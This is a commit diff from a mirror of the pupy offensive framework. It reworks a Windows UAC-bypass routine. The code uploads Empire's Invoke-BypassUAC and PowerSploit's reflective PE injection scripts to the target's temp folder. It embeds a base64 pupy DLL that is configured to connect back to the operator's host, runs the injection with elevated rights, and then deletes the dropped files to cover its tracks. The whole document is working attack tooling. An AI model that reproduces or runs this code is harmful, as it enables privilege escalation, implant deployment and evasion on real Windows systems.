mirror of https://github.com/n1nj4sec/pupy.git
Remove temp files remotely and use pupy powershell module
This commit is contained in:
root
parent
069d892ec0
commit
3d89e1319a
|
|
@ -5,9 +5,10 @@ import platform
|
||||||
import pupygen
|
import pupygen
|
||||||
from rpyc.utils.classic import upload
|
from rpyc.utils.classic import upload
|
||||||
import base64
|
import base64
|
||||||
from tempfile import gettempdir
|
from tempfile import gettempdir, _get_candidate_names
|
||||||
import subprocess
|
import subprocess
|
||||||
|
from modules.lib.windows.powershell_upload import execute_powershell_script
|
||||||
|
import re
|
||||||
|
|
||||||
def bypassuac_through_trusted_publisher_certificate(module, rootPupyPath):
|
def bypassuac_through_trusted_publisher_certificate(module, rootPupyPath):
|
||||||
'''
|
'''
|
||||||
|
|
@ -15,37 +16,36 @@ def bypassuac_through_trusted_publisher_certificate(module, rootPupyPath):
|
||||||
'''
|
'''
|
||||||
module.client.load_package("psutil")
|
module.client.load_package("psutil")
|
||||||
module.client.load_package("pupwinutils.processes")
|
module.client.load_package("pupwinutils.processes")
|
||||||
|
#Define Remote paths
|
||||||
remoteTempFolder=module.client.conn.modules['os.path'].expandvars("%TEMP%")
|
remoteTempFolder=module.client.conn.modules['os.path'].expandvars("%TEMP%")
|
||||||
changeMeTag = "$$$CHANGE_ME$$$"
|
invokeReflectivePEInjectionRemotePath = "{0}.{1}".format(module.client.conn.modules['os.path'].join(remoteTempFolder, next(_get_candidate_names())), '.txt')
|
||||||
#First powershell script executed by Invoke-BypassUAC
|
invokeBypassUACRemotePath = "{0}.{1}".format(module.client.conn.modules['os.path'].join(remoteTempFolder, next(_get_candidate_names())), '.ps1')
|
||||||
mainPowerShellScript = """
|
mainPowershellScriptRemotePath = "{0}.{1}".format(module.client.conn.modules['os.path'].join(remoteTempFolder, next(_get_candidate_names())), '.ps1')
|
||||||
cat $$$CHANGE_ME$$$\Invoke-BypassUAC.txt | Out-String | iex
|
pupyDLLRemotePath = "{0}.{1}".format(module.client.conn.modules['os.path'].join(remoteTempFolder, next(_get_candidate_names())), '.txt')
|
||||||
Invoke-BypassUAC -Command 'powershell.exe -ExecutionPolicy Bypass -file $$$CHANGE_ME$$$\secdPowerShellScriptPrivileged.ps1' -Verbose
|
#Define Local paths
|
||||||
"""
|
mainPowerShellScriptPrivilegedLocalPath = os.path.join(gettempdir(),'mainPowerShellScriptPrivileged.txt')
|
||||||
#Second powershell script executed by first main script (privileged)
|
invokeBypassUACLocalPath = os.path.join(rootPupyPath, "pupy", "external", "Empire", "privesc", "Invoke-BypassUAC.ps1")
|
||||||
secdPowerShellScriptPrivileged = """
|
invokeReflectivePEInjectionLocalPath = os.path.join(rootPupyPath,"pupy", "external", "PowerSploit", "CodeExecution", "Invoke-ReflectivePEInjection.ps1")
|
||||||
cat $$$CHANGE_ME$$$\Invoke-ReflectivePEInjection.txt | Out-String | iex
|
invokeBypassUACLocalPath = os.path.join(rootPupyPath,"pupy", "external", "Empire", "privesc", "Invoke-BypassUAC.ps1")
|
||||||
cat $$$CHANGE_ME$$$\dllFile.txt | Out-String | iex
|
pupyDLLLocalPath = os.path.join(gettempdir(),'dllFile.txt')
|
||||||
|
#Constants
|
||||||
|
bypassUACcmd = "Invoke-BypassUAC -Command 'powershell.exe -ExecutionPolicy Bypass -file {0} -Verbose'".format(mainPowershellScriptRemotePath) #{0}=mainPowerShellScriptPrivileged.ps1
|
||||||
|
byPassUACSuccessString = "DLL injection complete!"
|
||||||
|
#main powershell script executed by bypassuac powershell script
|
||||||
|
mainPowerShellScriptPrivileged = """
|
||||||
|
cat {0} | Out-String | iex
|
||||||
|
cat {1} | Out-String | iex
|
||||||
Invoke-ReflectivePEInjection -PEBytes $PEBytes -ForceASLR
|
Invoke-ReflectivePEInjection -PEBytes $PEBytes -ForceASLR
|
||||||
"""
|
""" #{0}=Invoke-ReflectivePEInjection.txt and {1}=dllFile.txt
|
||||||
mainPowerShellScriptPath = os.path.join(gettempdir(),'mainPowerShellScript.txt')
|
logging.info("Creating the Powershell script in %s locally"%(mainPowerShellScriptPrivilegedLocalPath))
|
||||||
logging.info("Creating the main Powershell script in %s locally"%(mainPowerShellScriptPath))
|
with open(mainPowerShellScriptPrivilegedLocalPath, 'w+') as w:
|
||||||
f = open(mainPowerShellScriptPath,'w+')
|
w.write(mainPowerShellScriptPrivileged.format(invokeReflectivePEInjectionRemotePath, pupyDLLRemotePath))
|
||||||
f.write(mainPowerShellScript.replace(changeMeTag, remoteTempFolder))
|
logging.info("Uploading powershell code for DLL injection in {0}".format(invokeReflectivePEInjectionRemotePath))
|
||||||
f.close()
|
upload(module.client.conn, invokeReflectivePEInjectionLocalPath, invokeReflectivePEInjectionRemotePath)
|
||||||
secdPowerShellScriptPrivilegedPath = os.path.join(gettempdir(),'secdPowerShellScriptPrivileged.txt')
|
#logging.info("Uploading powershell code for UAC Bypass in {0}".format())
|
||||||
logging.info("Creating the second Powershell script in %s locally"%(secdPowerShellScriptPrivilegedPath))
|
#upload(module.client.conn, invokeBypassUACLocalPath, invokeBypassUACRemotePath)
|
||||||
f = open(secdPowerShellScriptPrivilegedPath,'w+')
|
logging.info("Uploading main powershell script executed by BypassUAC in {0}".format(mainPowerShellScriptPrivilegedLocalPath))
|
||||||
f.write(secdPowerShellScriptPrivileged.replace(changeMeTag, remoteTempFolder))
|
upload(module.client.conn, mainPowerShellScriptPrivilegedLocalPath, mainPowershellScriptRemotePath)
|
||||||
f.close()
|
|
||||||
logging.info("Uploading powershell code for DLL injection...")
|
|
||||||
upload(module.client.conn, os.path.join(rootPupyPath,"pupy", "external", "PowerSploit", "CodeExecution", "Invoke-ReflectivePEInjection.ps1"), module.client.conn.modules['os.path'].join(remoteTempFolder,'Invoke-ReflectivePEInjection.txt'))
|
|
||||||
logging.info("Uploading powershell code for UAC Bypass...")
|
|
||||||
upload(module.client.conn, os.path.join(rootPupyPath,"pupy", "external", "Empire", "privesc", "Invoke-BypassUAC.ps1"), module.client.conn.modules['os.path'].join(remoteTempFolder,'Invoke-BypassUAC.txt'))
|
|
||||||
logging.info("Uploading main powershell script...")
|
|
||||||
upload(module.client.conn, mainPowerShellScriptPath, module.client.conn.modules['os.path'].join(remoteTempFolder,'mainPowerShellScript.ps1'))
|
|
||||||
logging.info("Uploading second powershell script...")
|
|
||||||
upload(module.client.conn, secdPowerShellScriptPrivilegedPath, module.client.conn.modules['os.path'].join(remoteTempFolder,'secdPowerShellScriptPrivileged.ps1'))
|
|
||||||
res=module.client.conn.modules['pupy'].get_connect_back_host()
|
res=module.client.conn.modules['pupy'].get_connect_back_host()
|
||||||
host, port = res.rsplit(':',1)
|
host, port = res.rsplit(':',1)
|
||||||
logging.info("Address configured is %s:%s for pupy dll..."%(host,port))
|
logging.info("Address configured is %s:%s for pupy dll..."%(host,port))
|
||||||
|
|
@ -59,20 +59,23 @@ def bypassuac_through_trusted_publisher_certificate(module, rootPupyPath):
|
||||||
else:
|
else:
|
||||||
module.error("Target architecture is unknown (!= x86 or x64), abording...")
|
module.error("Target architecture is unknown (!= x86 or x64), abording...")
|
||||||
return
|
return
|
||||||
pupyDLLPath = os.path.join(gettempdir(),'dllFile.txt')
|
logging.info("Creating the pupy dll in %s locally"%(pupyDLLLocalPath))
|
||||||
remotePupyDLLPath = module.client.conn.modules['os.path'].join(remoteTempFolder,'dllFile.txt')
|
with open(pupyDLLLocalPath, 'w+') as w:
|
||||||
logging.info("Creating the pupy dll in %s locally"%(pupyDLLPath))
|
w.write('$PEBytes = [System.Convert]::FromBase64String("%s")'%(base64.b64encode(dllbuff)))
|
||||||
f = open(pupyDLLPath,'w+')
|
logging.info("Uploading pupy dll in {0}".format(pupyDLLRemotePath))
|
||||||
f.write('$PEBytes = [System.Convert]::FromBase64String("%s")'%(base64.b64encode(dllbuff)))
|
upload(module.client.conn, pupyDLLLocalPath, pupyDLLRemotePath)
|
||||||
f.close()
|
content = re.sub("Write-Verbose ","Write-Output ", open(invokeBypassUACLocalPath, 'r').read(), flags=re.I)
|
||||||
logging.info("Uploading pupy dll...")
|
logging.info("Starting BypassUAC script with the following cmd: {0}".format(bypassUACcmd))
|
||||||
upload(module.client.conn, pupyDLLPath, remotePupyDLLPath)
|
output = execute_powershell_script(module, content, bypassUACcmd)
|
||||||
output = module.client.conn.modules.subprocess.check_output("PowerShell.exe -ExecutionPolicy Bypass -File %s"%(module.client.conn.modules['os.path'].join(remoteTempFolder,'mainPowerShellScript.ps1')), stderr=subprocess.STDOUT, stdin=subprocess.PIPE, shell = True)
|
logging.info("BypassUAC script output: %s\n"%(output))
|
||||||
logging.info("BypassUAC script output: %s"%(output))
|
if byPassUACSuccessString in output:
|
||||||
if "DLL injection complete!" in output:
|
|
||||||
module.success("UAC bypassed")
|
module.success("UAC bypassed")
|
||||||
else:
|
else:
|
||||||
module.warning("Impossible to know what's happened remotely")
|
module.warning("Impossible to know what's happened remotely. You should active debug mode.")
|
||||||
|
for aFile in [invokeReflectivePEInjectionRemotePath, invokeBypassUACRemotePath, mainPowershellScriptRemotePath, pupyDLLRemotePath]:
|
||||||
|
logging.info("Deleting remote file {0}".format(aFile))
|
||||||
|
output = module.client.conn.modules.subprocess.check_output("DEL /F /Q \"{0}\"".format(aFile), stderr=subprocess.STDOUT, stdin=subprocess.PIPE, shell = True)
|
||||||
|
logging.debug("Delete Status: {0}".format(repr(output)))
|
||||||
module.success("Waiting for a connection from the DLL (take few seconds)...")
|
module.success("Waiting for a connection from the DLL (take few seconds)...")
|
||||||
|
|
||||||
|
|
||||||
|
|
|
||||||
Loading…
Reference in New Issue